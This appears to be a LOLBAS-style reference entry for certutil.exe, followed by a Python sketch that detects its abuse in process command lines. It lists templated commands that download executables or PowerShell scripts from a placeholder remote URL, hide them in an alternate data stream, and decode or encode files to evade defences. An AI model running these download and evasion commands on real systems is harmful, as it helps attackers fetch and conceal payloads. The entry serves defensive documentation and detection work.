Certutil.exe
Windows binary used for handling certificates
ADS
Download file from Internet and save it in an NTFS Alternate Data Stream
certutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt
Download and save a .ps1 file to an Alternate Data Stream (ADS). — MITRE: T1564.004 — Privileges: User
Decode
Decode files to evade defensive measures
certutil -decode {PATH:.base64} {PATH}
Command to decode a Base64-encoded file. — MITRE: T1140 — Privileges: User
Decode files to evade defensive measures
certutil -decodehex {PATH:.hex} {PATH}
Command to decode a hexadecimal-encoded file. — MITRE: T1140 — Privileges: User
Download
Download file from Internet
certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe}
Download and save an executable to disk in the current folder. — MITRE: T1105 — Privileges: User
Download file from Internet
certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe}
Download and save an executable to disk in the current folder when a file path is specified, or `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\<hash>` when not. — MITRE: T1105 — Privileges: User
Download file from Internet
certutil.exe -URL {REMOTEURL:.exe}
Download and save an executable to `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\<hash>`. — MITRE: T1105 — Privileges: User
Encode
Encode files to evade defensive measures
certutil -encode {PATH} {PATH:.base64}
Command to encode a file using Base64. — MITRE: T1027.013 — Privileges: User
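
Detection sketch (an added example, not part of the original entry or the LOLBAS project): it classifies process-creation command lines against the switches and MITRE technique IDs listed above, accepting either `-` or `/` as the switch prefix and flagging a download whose output path names an alternate data stream. The function names and the sample command lines are constructed for illustration.

```python
import re

# Switches and ATT&CK technique IDs exactly as listed on this page.
SWITCHES = {
    "urlcache": ("Download", "T1105"),
    "verifyctl": ("Download", "T1105"),
    "url": ("Download", "T1105"),
    "decode": ("Decode", "T1140"),
    "decodehex": ("Decode", "T1140"),
    "encode": ("Encode", "T1027.013"),
}
TOKEN = re.compile(r'"[^"]*"|\S+')          # keep quoted paths as one token
DRIVE = re.compile(r"^[A-Za-z]:(?=[\\/])")  # drive-letter colon is not a stream

def has_ads(arg):
    """True if a local path argument names an alternate data stream."""
    if "://" in arg:  # URLs contain colons but are not ADS paths
        return False
    return ":" in DRIVE.sub("", arg)

def classify(cmdline):
    """Return sorted (function, technique) pairs for one process command line."""
    tokens = [t.strip('"') for t in TOKEN.findall(cmdline)]
    if not tokens:
        return []
    image = re.split(r"[\\/]", tokens[0])[-1].lower()
    if image not in ("certutil", "certutil.exe"):
        return []
    hits = set()
    for arg in tokens[1:]:
        # certutil accepts both "-" and "/" as the switch prefix, in any case
        if arg.startswith(("-", "/")):
            match = SWITCHES.get(arg.lstrip("-/").lower())
            if match:
                hits.add(match)
    if ("Download", "T1105") in hits and any(has_ads(a) for a in tokens[1:]):
        hits.add(("ADS", "T1564.004"))
    return sorted(hits)

# Constructed process-creation command lines (not from the page or real logs).
SAMPLE = [
    r"certutil.exe -urlcache -f https://example.com/a.ps1 C:\Temp\notes.txt:ttt",
    r'"C:\Windows\System32\CERTUTIL.EXE" /DecodeHex C:\Temp\in.hex C:\Temp\out.bin',
    r"certutil -hashfile C:\Temp\a.bin SHA256",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line), "<-", line)
```

Matching is on the image file name only, so a renamed copy of the binary is out of scope for this sketch.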